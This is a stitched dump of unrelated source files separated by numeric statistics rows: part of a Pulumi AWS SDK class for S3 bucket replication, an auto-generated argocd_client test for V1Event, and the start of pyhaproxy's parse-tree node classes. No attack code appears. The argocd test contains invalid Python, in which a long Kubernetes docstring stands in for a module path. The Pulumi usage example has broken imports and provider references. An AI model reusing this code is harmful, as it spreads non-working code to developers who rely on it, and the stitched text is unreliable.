pulumi.set(__self__, "role", role)
pulumi.set(__self__, "rules", rules)
@property
@pulumi.getter
def bucket(self) -> pulumi.Input[str]:
"""
The name of the source S3 bucket you want Amazon S3 to monitor.
"""
return pulumi.get(self, "bucket")
@bucket.setter
def bucket(self, value: pulumi.Input[str]):
pulumi.set(self, "bucket", value)
@property
@pulumi.getter
def role(self) -> pulumi.Input[str]:
"""
The ARN of the IAM role for Amazon S3 to assume when replicating the objects.
"""
return pulumi.get(self, "role")
@role.setter
def role(self, value: pulumi.Input[str]):
pulumi.set(self, "role", value)
@property
@pulumi.getter
def rules(self) -> pulumi.Input[Sequence[pulumi.Input['BucketReplicationConfigRuleArgs']]]:
"""
Set of configuration blocks describing the rules managing the replication documented below.
"""
return pulumi.get(self, "rules")
@rules.setter
def rules(self, value: pulumi.Input[Sequence[pulumi.Input['BucketReplicationConfigRuleArgs']]]):
pulumi.set(self, "rules", value)
@pulumi.input_type
class _BucketReplicationConfigState:
def __init__(__self__, *,
bucket: Optional[pulumi.Input[str]] = None,
role: Optional[pulumi.Input[str]] = None,
rules: Optional[pulumi.Input[Sequence[pulumi.Input['BucketReplicationConfigRuleArgs']]]] = None):
"""
Input properties used for looking up and filtering BucketReplicationConfig resources.
:param pulumi.Input[str] bucket: The name of the source S3 bucket you want Amazon S3 to monitor.
:param pulumi.Input[str] role: The ARN of the IAM role for Amazon S3 to assume when replicating the objects.
:param pulumi.Input[Sequence[pulumi.Input['BucketReplicationConfigRuleArgs']]] rules: Set of configuration blocks describing the rules managing the replication documented below.
"""
if bucket is not None:
pulumi.set(__self__, "bucket", bucket)
if role is not None:
pulumi.set(__self__, "role", role)
if rules is not None:
pulumi.set(__self__, "rules", rules)
@property
@pulumi.getter
def bucket(self) -> Optional[pulumi.Input[str]]:
"""
The name of the source S3 bucket you want Amazon S3 to monitor.
"""
return pulumi.get(self, "bucket")
@bucket.setter
def bucket(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "bucket", value)
@property
@pulumi.getter
def role(self) -> Optional[pulumi.Input[str]]:
"""
The ARN of the IAM role for Amazon S3 to assume when replicating the objects.
"""
return pulumi.get(self, "role")
@role.setter
def role(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "role", value)
@property
@pulumi.getter
def rules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['BucketReplicationConfigRuleArgs']]]]:
"""
Set of configuration blocks describing the rules managing the replication documented below.
"""
return pulumi.get(self, "rules")
@rules.setter
def rules(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['BucketReplicationConfigRuleArgs']]]]):
pulumi.set(self, "rules", value)
class BucketReplicationConfig(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
bucket: Optional[pulumi.Input[str]] = None,
role: Optional[pulumi.Input[str]] = None,
rules: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['BucketReplicationConfigRuleArgs']]]]] = None,
__props__=None):
"""
Provides an independent configuration resource for S3 bucket [replication configuration](http://docs.aws.amazon.com/AmazonS3/latest/dev/crr.html).
## Example Usage
### Using replication configuration
```python
import pulumi
import pulumi_aws as aws
import pulumi_pulumi as pulumi
central = pulumi.providers.Aws("central", region="eu-central-1")
replication_role = aws.iam.Role("replicationRole", assume_role_policy=\"\"\"{
"Version": "2012-10-17",
"Statement": [
{
"Action": "sts:AssumeRole",
"Principal": {
"Service": "s3.amazonaws.com"
},
"Effect": "Allow",
"Sid": ""
}
]
}
\"\"\")
destination_bucket_v2 = aws.s3.BucketV2("destinationBucketV2")
source_bucket_v2 = aws.s3.BucketV2("sourceBucketV2", opts=pulumi.ResourceOptions(provider=aws["central"]))
replication_policy = aws.iam.Policy("replicationPolicy", policy=pulumi.Output.all(source_bucket_v2.arn, source_bucket_v2.arn, destination_bucket_v2.arn).apply(lambda sourceBucketV2Arn, sourceBucketV2Arn1, destinationBucketV2Arn: f\"\"\"{{
"Version": "2012-10-17",
"Statement": [
{{
"Action": [
"s3:GetReplicationConfiguration",
"s3:ListBucket"
],
"Effect": "Allow",
"Resource": [
"{source_bucket_v2_arn}"
]
}},
{{
"Action": [
"s3:GetObjectVersionForReplication",
"s3:GetObjectVersionAcl",
"s3:GetObjectVersionTagging"
],
"Effect": "Allow",
"Resource": [
"{source_bucket_v2_arn1}/*"
]
}},
{{
"Action": [
"s3:ReplicateObject",
"s3:ReplicateDelete",
"s3:ReplicateTags"
],
"Effect": "Allow",
"Resource": "{destination_bucket_v2_arn}/*"
}}
]
}}
\"\"\"))
replication_role_policy_attachment = aws.iam.RolePolicyAttachment("replicationRolePolicyAttachment",
role=replication_role.name,
policy_arn=replication_policy.arn)
destination_bucket_versioning_v2 = aws.s3.BucketVersioningV2("destinationBucketVersioningV2",
bucket=destination_bucket_v2.id,
versioning_configuration=aws.s3.BucketVersioningV2VersioningConfigurationArgs(
status="Enabled",
))
source_bucket_acl = aws.s3.BucketAclV2("sourceBucketAcl",
bucket=source_bucket_v2.id,
acl="private")
source_bucket_versioning_v2 = aws.s3.BucketVersioningV2("sourceBucketVersioningV2",
bucket=source_bucket_v2.id,
versioning_configuration=aws.s3.BucketVersioningV2VersioningConfigurationArgs(
status="Enabled",
),
opts=pulumi.ResourceOptions(provider=aws["central"]))
replication_bucket_replication_config = aws.s3.BucketReplicationConfig("replicationBucketReplicationConfig",
role=replication_role.arn,
bucket=source_bucket_v2.id,
rules=[aws.s3.BucketReplicationConfigRuleArgs(
id="foobar",
prefix="foo",
status="Enabled",
destination=aws.s3.BucketReplicationConfigRuleDestinationArgs(
bucket=destination_bucket_v2.arn,
storage_class="STANDARD",
),
)],
opts=pulumi.ResourceOptions(depends_on=[source_bucket_versioning_v2]))
```
### Bi-Directional Replication
```python
import pulumi
import pulumi_aws as aws
# ... other configuration ...
east_bucket_v2 = aws.s3.BucketV2("eastBucketV2")
east_bucket_versioning_v2 = aws.s3.BucketVersioningV2("eastBucketVersioningV2",
bucket=east_bucket_v2.id,
versioning_configuration=aws.s3.BucketVersioningV2VersioningConfigurationArgs(
status="Enabled",
))
west_bucket_v2 = aws.s3.BucketV2("westBucketV2", opts=pulumi.ResourceOptions(provider=west))
west_bucket_versioning_v2 = aws.s3.BucketVersioningV2("westBucketVersioningV2",
bucket=west_bucket_v2.id,
versioning_configuration=aws.s3.BucketVersioningV2VersioningConfigurationArgs(
status="Enabled",
),
opts=pulumi.ResourceOptions(provider=west))
east_to_west = aws.s3.BucketReplicationConfig("eastToWest",
role=aws_iam_role["east_replication"]["arn"],
bucket=east_bucket_v2.id,
rules=[aws.s3.BucketReplicationConfigRuleArgs(
id="foobar",
prefix="foo",
status="Enabled",
destination=aws.s3.BucketReplicationConfigRuleDestinationArgs(
bucket=west_bucket_v2.arn,
storage_class="STANDARD",
),
)],
opts=pulumi.ResourceOptions(depends_on=[east_bucket_versioning_v2]))
west_to_east = aws.s3.BucketReplicationConfig("westToEast",
role=aws_iam_role["west_replication"]["arn"],
bucket=west_bucket_v2.id,
rules=[aws.s3.BucketReplicationConfigRuleArgs(
id="foobar",
prefix="foo",
status="Enabled",
destination=aws.s3.BucketReplicationConfigRuleDestinationArgs(
bucket=east_bucket_v2.arn,
storage_class="STANDARD",
),
)],
opts=pulumi.ResourceOptions(depends_on=[west_bucket_versioning_v2]))
```
## Import
S3 bucket replication configuration can be imported using the `bucket`, e.g.
```sh
$ pulumi import aws:s3/bucketReplicationConfig:BucketReplicationConfig replication bucket-name
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] bucket: The name of the source S3 bucket you want Amazon S3 to monitor.
:param pulumi.Input[str] role: The ARN of the IAM role for Amazon S3 to assume when replicating the objects.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['BucketReplicationConfigRuleArgs']]]] rules: Set of configuration blocks describing the rules managing the replication documented below.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: BucketReplicationConfigArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides an independent configuration resource for S3 bucket [replication configuration](http://docs.aws.amazon.com/AmazonS3/latest/dev/crr.html).
## Example Usage
### Using replication configuration
```python
import pulumi
import pulumi_aws as aws
import pulumi_pulumi as pulumi
central = pulumi.providers.Aws("central", region="eu-central-1")
replication_role = aws.iam.Role("replicationRole", assume_role_policy=\"\"\"{
"Version": "2012-10-17",
"Statement": [
{
"Action": "sts:AssumeRole",
"Principal": {
"Service": "s3.amazonaws.com"
},
"Effect": "Allow",
"Sid": ""
}
]
}
\"\"\")
destination_bucket_v2 = aws.s3.BucketV2("destinationBucketV2")
source_bucket_v2 = aws.s3.BucketV2("sourceBucketV2", opts=pulumi.ResourceOptions(provider=aws["central"]))
replication_policy = aws.iam.Policy("replicationPolicy", policy=pulumi.Output.all(source_bucket_v2.arn, source_bucket_v2.arn, destination_bucket_v2.arn).apply(lambda sourceBucketV2Arn, sourceBucketV2Arn1, destinationBucketV2Arn: f\"\"\"{{
"Version": "2012-10-17",
"Statement": [
{{
"Action": [
"s3:GetReplicationConfiguration",
"s3:ListBucket"
],
"Effect": "Allow",
"Resource": [
"{source_bucket_v2_arn}"
]
}},
{{
"Action": [
"s3:GetObjectVersionForReplication",
"s3:GetObjectVersionAcl",
"s3:GetObjectVersionTagging"
],
"Effect": "Allow",
"Resource": [
"{source_bucket_v2_arn1}/*"
]
}},
{{
"Action": [
"s3:ReplicateObject",
"s3:ReplicateDelete",
"s3:ReplicateTags"
],
"Effect": "Allow",
"Resource": "{destination_bucket_v2_arn}/*"
}}
]
}}
\"\"\"))
replication_role_policy_attachment = aws.iam.RolePolicyAttachment("replicationRolePolicyAttachment",
role=replication_role.name,
policy_arn=replication_policy.arn)
destination_bucket_versioning_v2 = aws.s3.BucketVersioningV2("destinationBucketVersioningV2",
bucket=destination_bucket_v2.id,
versioning_configuration=aws.s3.BucketVersioningV2VersioningConfigurationArgs(
status="Enabled",
))
source_bucket_acl = aws.s3.BucketAclV2("sourceBucketAcl",
bucket=source_bucket_v2.id,
acl="private")
source_bucket_versioning_v2 = aws.s3.BucketVersioningV2("sourceBucketVersioningV2",
bucket=source_bucket_v2.id,
versioning_configuration=aws.s3.BucketVersioningV2VersioningConfigurationArgs(
status="Enabled",
),
opts=pulumi.ResourceOptions(provider=aws["central"]))
replication_bucket_replication_config = aws.s3.BucketReplicationConfig("replicationBucketReplicationConfig",
role=replication_role.arn,
bucket=source_bucket_v2.id,
rules=[aws.s3.BucketReplicationConfigRuleArgs(
id="foobar",
prefix="foo",
status="Enabled",
destination=aws.s3.BucketReplicationConfigRuleDestinationArgs(
bucket=destination_bucket_v2.arn,
storage_class="STANDARD",
),
)],
opts=pulumi.ResourceOptions(depends_on=[source_bucket_versioning_v2]))
```
### Bi-Directional Replication
```python
import pulumi
import pulumi_aws as aws
# ... other configuration ...
east_bucket_v2 = aws.s3.BucketV2("eastBucketV2")
east_bucket_versioning_v2 = aws.s3.BucketVersioningV2("eastBucketVersioningV2",
bucket=east_bucket_v2.id,
versioning_configuration=aws.s3.BucketVersioningV2VersioningConfigurationArgs(
status="Enabled",
))
west_bucket_v2 = aws.s3.BucketV2("westBucketV2", opts=pulumi.ResourceOptions(provider=west))
west_bucket_versioning_v2 = aws.s3.BucketVersioningV2("westBucketVersioningV2",
bucket=west_bucket_v2.id,
versioning_configuration=aws.s3.BucketVersioningV2VersioningConfigurationArgs(
status="Enabled",
),
opts=pulumi.ResourceOptions(provider=west))
east_to_west = aws.s3.BucketReplicationConfig("eastToWest",
role=aws_iam_role["east_replication"]["arn"],
bucket=east_bucket_v2.id,
rules=[aws.s3.BucketReplicationConfigRuleArgs(
id="foobar",
prefix="foo",
status="Enabled",
destination=aws.s3.BucketReplicationConfigRuleDestinationArgs(
bucket=west_bucket_v2.arn,
storage_class="STANDARD",
),
)],
opts=pulumi.ResourceOptions(depends_on=[east_bucket_versioning_v2]))
west_to_east = aws.s3.BucketReplicationConfig("westToEast",
role=aws_iam_role["west_replication"]["arn"],
bucket=west_bucket_v2.id,
rules=[aws.s3.BucketReplicationConfigRuleArgs(
id="foobar",
prefix="foo",
status="Enabled",
destination=aws.s3.BucketReplicationConfigRuleDestinationArgs(
bucket=east_bucket_v2.arn,
storage_class="STANDARD",
),
)],
opts=pulumi.ResourceOptions(depends_on=[west_bucket_versioning_v2]))
```
## Import
S3 bucket replication configuration can be imported using the `bucket`, e.g.
```sh
$ pulumi import aws:s3/bucketReplicationConfig:BucketReplicationConfig replication bucket-name
```
:param str resource_name: The name of the resource.
:param BucketReplicationConfigArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(BucketReplicationConfigArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
bucket: Optional[pulumi.Input[str]] = None,
role: Optional[pulumi.Input[str]] = None,
rules: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['BucketReplicationConfigRuleArgs']]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = BucketReplicationConfigArgs.__new__(BucketReplicationConfigArgs)
if bucket is None and not opts.urn:
raise TypeError("Missing required property 'bucket'")
__props__.__dict__["bucket"] = bucket
if role is None and not opts.urn:
raise TypeError("Missing required property 'role'")
__props__.__dict__["role"] = role
if rules is None and not opts.urn:
raise TypeError("Missing required property 'rules'")
__props__.__dict__["rules"] = rules
super(BucketReplicationConfig, __self__).__init__(
'aws:s3/bucketReplicationConfig:BucketReplicationConfig',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
bucket: Optional[pulumi.Input[str]] = None,
role: Optional[pulumi.Input[str]] = None,
rules: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['BucketReplicationConfigRuleArgs']]]]] = None) -> 'BucketReplicationConfig':
"""
Get an existing BucketReplicationConfig resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] bucket: The name of the source S3 bucket you want Amazon S3 to monitor.
:param pulumi.Input[str] role: The ARN of the IAM role for Amazon S3 to assume when replicating the objects.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['BucketReplicationConfigRuleArgs']]]] rules: Set of configuration blocks describing the rules managing the replication documented below.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _BucketReplicationConfigState.__new__(_BucketReplicationConfigState)
__props__.__dict__["bucket"] = bucket
__props__.__dict__["role"] = role
__props__.__dict__["rules"] = rules
return BucketReplicationConfig(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def bucket(self) -> pulumi.Output[str]:
"""
The name of the source S3 bucket you want Amazon S3 to monitor.
"""
return pulumi.get(self, "bucket")
@property
@pulumi.getter
def role(self) -> pulumi.Output[str]:
"""
The ARN of the IAM role for Amazon S3 to assume when replicating the objects.
"""
return pulumi.get(self, "role")
@property
@pulumi.getter
def rules(self) -> pulumi.Output[Sequence['outputs.BucketReplicationConfigRule']]:
"""
Set of configuration blocks describing the rules managing the replication documented below.
"""
return pulumi.get(self, "rules")
| 42.637201
| 246
| 0.611956
| 2,182
| 23,152
| 6.296975
| 0.111824
| 0.044833
| 0.02853
| 0.023654
| 0.850946
| 0.831805
| 0.822344
| 0.804876
| 0.801164
| 0.8
| 0
| 0.014246
| 0.287491
| 23,152
| 542
| 247
| 42.715867
| 0.818683
| 0.579259
| 0
| 0.530201
| 1
| 0
| 0.119147
| 0.063153
| 0
| 0
| 0
| 0
| 0
| 1
| 0.147651
| false
| 0.006711
| 0.04698
| 0
| 0.281879
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d84999daea04c3cd59781b5dba9b6be8e14234ea
| 11,789
|
py
|
Python
|
test/test_v1_event.py
|
thepabloaguilar/argocd-client
|
a6c4ff268a63ee6715f9f837b9225b798aa6bde2
|
[
"BSD-3-Clause"
] | 1
|
2021-09-29T11:57:07.000Z
|
2021-09-29T11:57:07.000Z
|
test/test_v1_event.py
|
thepabloaguilar/argocd-client
|
a6c4ff268a63ee6715f9f837b9225b798aa6bde2
|
[
"BSD-3-Clause"
] | 1
|
2020-09-09T00:28:57.000Z
|
2020-09-09T00:28:57.000Z
|
test/test_v1_event.py
|
thepabloaguilar/argocd-client
|
a6c4ff268a63ee6715f9f837b9225b798aa6bde2
|
[
"BSD-3-Clause"
] | 2
|
2020-10-13T18:31:59.000Z
|
2021-02-15T12:52:33.000Z
|
# coding: utf-8
"""
Consolidate Services
Description of all APIs # noqa: E501
The version of the OpenAPI document: version not set
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import datetime
import argocd_client
from argocd_client.models.v1_event import V1Event # noqa: E501
from argocd_client.rest import ApiException
class TestV1Event(unittest.TestCase):
"""V1Event unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def make_instance(self, include_optional):
"""Test V1Event
include_option is a boolean, when False only required
params are included, when True both required and
optional params are included """
# model = argocd_client.models.v1_event.V1Event() # noqa: E501
if include_optional :
return V1Event(
action = '0',
count = 56,
event_time = argocd_client.models.v1_micro_time.v1MicroTime(
nanos = 56,
seconds = '0', ),
first_timestamp = argocd_client.models.v1_time.v1Time(
nanos = 56,
seconds = '0', ),
involved_object = argocd_client.models.object_reference_contains_enough_information_to_let_you_inspect_or_modify_the_referred_object/
___
new_uses_of_this_type_are_discouraged_because_of_difficulty_describing_its_usage_when_embedded_in_ap_is/
_1/_ignored_fields/__it_includes_many_fields_which_are_not_generally_honored/__for_instance,_resource_version_and_field_path_are_both_very_rarely_valid_in_actual_usage/
_2/_invalid_usage_help/__it_is_impossible_to_add_specific_help_for_individual_usage/__in_most_embedded_usages,_there_are_particular
____restrictions_like,_"must_refer_only_to_types_a_and_b"_or_"uid_not_honored"_or_"name_must_be_restricted"/
____those_cannot_be_well_described_when_embedded/
_3/_inconsistent_validation/__because_the_usages_are_different,_the_validation_rules_are_different_by_usage,_which_makes_it_hard_for_users_to_predict_what_will_happen/
_4/_the_fields_are_both_imprecise_and_overly_precise/__kind_is_not_a_precise_mapping_to_a_url/_this_can_produce_ambiguity
____during_interpretation_and_require_a_rest_mapping/__in_most_cases,_the_dependency_is_on_the_group,resource_tuple
____and_the_version_of_the_actual_struct_is_irrelevant/
_5/_we_cannot_easily_change_it/__because_this_type_is_embedded_in_many_locations,_updates_to_this_type
____will_affect_numerous_schemas/__don't_make_new_ap_is_embed_an_underspecified_api_type_they_do_not_control/
instead_of_using_this_type,_create_a_locally_provided_and_used_type_that_is_well_focused_on_your_reference/
for_example,_service_references_for_admission_registration:_https://github/com/kubernetes/api/blob/release_1/17/admissionregistration/v1/types/go#l533_/
+k8s:deepcopy_gen:interfaces=k8s/io/apimachinery/pkg/runtime/object.ObjectReference contains enough information to let you inspect or modify the referred object.
---
New uses of this type are discouraged because of difficulty describing its usage when embedded in APIs.
1. Ignored fields. It includes many fields which are not generally honored. For instance, ResourceVersion and FieldPath are both very rarely valid in actual usage.
2. Invalid usage help. It is impossible to add specific help for individual usage. In most embedded usages, there are particular
restrictions like, "must refer only to types A and B" or "UID not honored" or "name must be restricted".
Those cannot be well described when embedded.
3. Inconsistent validation. Because the usages are different, the validation rules are different by usage, which makes it hard for users to predict what will happen.
4. The fields are both imprecise and overly precise. Kind is not a precise mapping to a URL. This can produce ambiguity
during interpretation and require a REST mapping. In most cases, the dependency is on the group,resource tuple
and the version of the actual struct is irrelevant.
5. We cannot easily change it. Because this type is embedded in many locations, updates to this type
will affect numerous schemas. Don't make new APIs embed an underspecified API type they do not control.
Instead of using this type, create a locally provided and used type that is well-focused on your reference.
For example, ServiceReferences for admission registration: https://github.com/kubernetes/api/blob/release-1.17/admissionregistration/v1/types.go#L533 .
+k8s:deepcopy-gen:interfaces=k8s.io/apimachinery/pkg/runtime.Object(
api_version = '0',
field_path = '0',
kind = '0',
name = '0',
namespace = '0',
resource_version = '0',
uid = '0', ),
last_timestamp = argocd_client.models.v1_time.v1Time(
nanos = 56,
seconds = '0', ),
message = '0',
metadata = argocd_client.models.v1_object_meta.v1ObjectMeta(
annotations = {
'key' : '0'
},
cluster_name = '0',
creation_timestamp = argocd_client.models.v1_time.v1Time(
nanos = 56,
seconds = '0', ),
deletion_grace_period_seconds = '0',
deletion_timestamp = argocd_client.models.v1_time.v1Time(
nanos = 56,
seconds = '0', ),
finalizers = [
'0'
],
generate_name = '0',
generation = '0',
labels = {
'key' : '0'
},
managed_fields = [
argocd_client.models.v1_managed_fields_entry.v1ManagedFieldsEntry(
api_version = '0',
fields_type = '0',
fields_v1 = argocd_client.models.v1_fields_v1.v1FieldsV1(
raw = 'YQ==', ),
manager = '0',
operation = '0',
time = argocd_client.models.v1_time.v1Time(
nanos = 56,
seconds = '0', ), )
],
name = '0',
namespace = '0',
owner_references = [
argocd_client.models.v1_owner_reference.v1OwnerReference(
api_version = '0',
block_owner_deletion = True,
controller = True,
kind = '0',
name = '0',
uid = '0', )
],
resource_version = '0',
self_link = '0',
uid = '0', ),
reason = '0',
related = argocd_client.models.object_reference_contains_enough_information_to_let_you_inspect_or_modify_the_referred_object/
___
new_uses_of_this_type_are_discouraged_because_of_difficulty_describing_its_usage_when_embedded_in_ap_is/
_1/_ignored_fields/__it_includes_many_fields_which_are_not_generally_honored/__for_instance,_resource_version_and_field_path_are_both_very_rarely_valid_in_actual_usage/
_2/_invalid_usage_help/__it_is_impossible_to_add_specific_help_for_individual_usage/__in_most_embedded_usages,_there_are_particular
____restrictions_like,_"must_refer_only_to_types_a_and_b"_or_"uid_not_honored"_or_"name_must_be_restricted"/
____those_cannot_be_well_described_when_embedded/
_3/_inconsistent_validation/__because_the_usages_are_different,_the_validation_rules_are_different_by_usage,_which_makes_it_hard_for_users_to_predict_what_will_happen/
_4/_the_fields_are_both_imprecise_and_overly_precise/__kind_is_not_a_precise_mapping_to_a_url/_this_can_produce_ambiguity
____during_interpretation_and_require_a_rest_mapping/__in_most_cases,_the_dependency_is_on_the_group,resource_tuple
____and_the_version_of_the_actual_struct_is_irrelevant/
_5/_we_cannot_easily_change_it/__because_this_type_is_embedded_in_many_locations,_updates_to_this_type
____will_affect_numerous_schemas/__don't_make_new_ap_is_embed_an_underspecified_api_type_they_do_not_control/
instead_of_using_this_type,_create_a_locally_provided_and_used_type_that_is_well_focused_on_your_reference/
for_example,_service_references_for_admission_registration:_https://github/com/kubernetes/api/blob/release_1/17/admissionregistration/v1/types/go#l533_/
+k8s:deepcopy_gen:interfaces=k8s/io/apimachinery/pkg/runtime/object.ObjectReference contains enough information to let you inspect or modify the referred object.
---
New uses of this type are discouraged because of difficulty describing its usage when embedded in APIs.
1. Ignored fields. It includes many fields which are not generally honored. For instance, ResourceVersion and FieldPath are both very rarely valid in actual usage.
2. Invalid usage help. It is impossible to add specific help for individual usage. In most embedded usages, there are particular
restrictions like, "must refer only to types A and B" or "UID not honored" or "name must be restricted".
Those cannot be well described when embedded.
3. Inconsistent validation. Because the usages are different, the validation rules are different by usage, which makes it hard for users to predict what will happen.
4. The fields are both imprecise and overly precise. Kind is not a precise mapping to a URL. This can produce ambiguity
during interpretation and require a REST mapping. In most cases, the dependency is on the group,resource tuple
and the version of the actual struct is irrelevant.
5. We cannot easily change it. Because this type is embedded in many locations, updates to this type
will affect numerous schemas. Don't make new APIs embed an underspecified API type they do not control.
Instead of using this type, create a locally provided and used type that is well-focused on your reference.
For example, ServiceReferences for admission registration: https://github.com/kubernetes/api/blob/release-1.17/admissionregistration/v1/types.go#L533 .
+k8s:deepcopy-gen:interfaces=k8s.io/apimachinery/pkg/runtime.Object(
api_version = '0',
field_path = '0',
kind = '0',
name = '0',
namespace = '0',
resource_version = '0',
uid = '0', ),
reporting_component = '0',
reporting_instance = '0',
series = argocd_client.models.v1_event_series.v1EventSeries(
count = 56,
last_observed_time = argocd_client.models.v1_micro_time.v1MicroTime(
nanos = 56,
seconds = '0', ),
state = '0', ),
source = argocd_client.models.v1_event_source.v1EventSource(
component = '0',
host = '0', ),
type = '0'
)
else :
return V1Event(
)
def testV1Event(self):
"""Test V1Event"""
inst_req_only = self.make_instance(include_optional=False)
inst_req_and_optional = self.make_instance(include_optional=True)
if __name__ == '__main__':
unittest.main()
| 59.241206
| 168
| 0.676393
| 1,470
| 11,789
| 4.990476
| 0.189116
| 0.03108
| 0.041712
| 0.040894
| 0.815976
| 0.791303
| 0.791303
| 0.791303
| 0.791303
| 0.791303
| 0
| 0.020021
| 0.262787
| 11,789
| 198
| 169
| 59.540404
| 0.824071
| 0.009246
| 0
| 0.623529
| 1
| 0.105882
| 0.03092
| 0.009773
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.011765
| 0.035294
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d86c45907b72f4c0156dfbfcbdb4ecb0efbe4a8c
| 140,320
|
py
|
Python
|
pyhaproxy/pegnode.py
|
alisson276/pyhaproxy
|
7d38c7134689423081544f63d1ebb72b1e387199
|
[
"MIT"
] | 51
|
2015-11-25T08:31:43.000Z
|
2022-01-12T06:19:02.000Z
|
pyhaproxy/pegnode.py
|
alisson276/pyhaproxy
|
7d38c7134689423081544f63d1ebb72b1e387199
|
[
"MIT"
] | 16
|
2015-12-18T05:27:59.000Z
|
2021-02-08T04:16:56.000Z
|
pyhaproxy/pegnode.py
|
alisson276/pyhaproxy
|
7d38c7134689423081544f63d1ebb72b1e387199
|
[
"MIT"
] | 18
|
2016-01-07T10:30:28.000Z
|
2021-11-07T19:49:07.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from collections import defaultdict
import re
class TreeNode(object):
def __init__(self, text, offset, elements=None):
self.text = text
self.offset = offset
self.elements = elements or []
def __iter__(self):
for el in self.elements:
yield el
class GlobalSection(TreeNode):
def __init__(self, text, offset, elements):
super(GlobalSection, self).__init__(text, offset, elements)
self.global_header = elements[0]
self.config_block = elements[1]
class DefaultsSection(TreeNode):
def __init__(self, text, offset, elements):
super(DefaultsSection, self).__init__(text, offset, elements)
self.defaults_header = elements[0]
self.config_block = elements[1]
class UserlistSection(TreeNode):
def __init__(self, text, offset, elements):
super(UserlistSection, self).__init__(text, offset, elements)
self.userlist_header = elements[0]
self.config_block = elements[1]
class ListenSection(TreeNode):
def __init__(self, text, offset, elements):
super(ListenSection, self).__init__(text, offset, elements)
self.listen_header = elements[0]
self.config_block = elements[1]
class FrontendSection(TreeNode):
def __init__(self, text, offset, elements):
super(FrontendSection, self).__init__(text, offset, elements)
self.frontend_header = elements[0]
self.config_block = elements[1]
class BackendSection(TreeNode):
def __init__(self, text, offset, elements):
super(BackendSection, self).__init__(text, offset, elements)
self.backend_header = elements[0]
self.config_block = elements[1]
class GlobalHeader(TreeNode):
def __init__(self, text, offset, elements):
super(GlobalHeader, self).__init__(text, offset, elements)
self.whitespace = elements[2]
self.line_break = elements[4]
class UserlistHeader(TreeNode):
def __init__(self, text, offset, elements):
super(UserlistHeader, self).__init__(text, offset, elements)
self.whitespace = elements[2]
self.proxy_name = elements[3]
self.line_break = elements[5]
class DefaultsHeader(TreeNode):
def __init__(self, text, offset, elements):
super(DefaultsHeader, self).__init__(text, offset, elements)
self.whitespace = elements[4]
self.line_break = elements[6]
self.proxy_name = elements[3]
class ListenHeader(TreeNode):
def __init__(self, text, offset, elements):
super(ListenHeader, self).__init__(text, offset, elements)
self.whitespace = elements[4]
self.proxy_name = elements[3]
self.line_break = elements[8]
self.service_address = elements[5]
class FrontendHeader(TreeNode):
def __init__(self, text, offset, elements):
super(FrontendHeader, self).__init__(text, offset, elements)
self.whitespace = elements[4]
self.proxy_name = elements[3]
self.line_break = elements[8]
self.service_address = elements[5]
class BackendHeader(TreeNode):
def __init__(self, text, offset, elements):
super(BackendHeader, self).__init__(text, offset, elements)
self.whitespace = elements[4]
self.proxy_name = elements[3]
self.line_break = elements[7]
class ServerLine(TreeNode):
def __init__(self, text, offset, elements):
super(ServerLine, self).__init__(text, offset, elements)
self.whitespace = elements[4]
self.server_name = elements[3]
self.service_address = elements[5]
self.line_break = elements[8]
self.value = elements[6]
class OptionLine(TreeNode):
def __init__(self, text, offset, elements):
super(OptionLine, self).__init__(text, offset, elements)
self.whitespace = elements[4]
self.whitespaceplus = elements[2]
self.keyword = elements[3]
self.line_break = elements[7]
self.value = elements[5]
class BindLine(TreeNode):
def __init__(self, text, offset, elements):
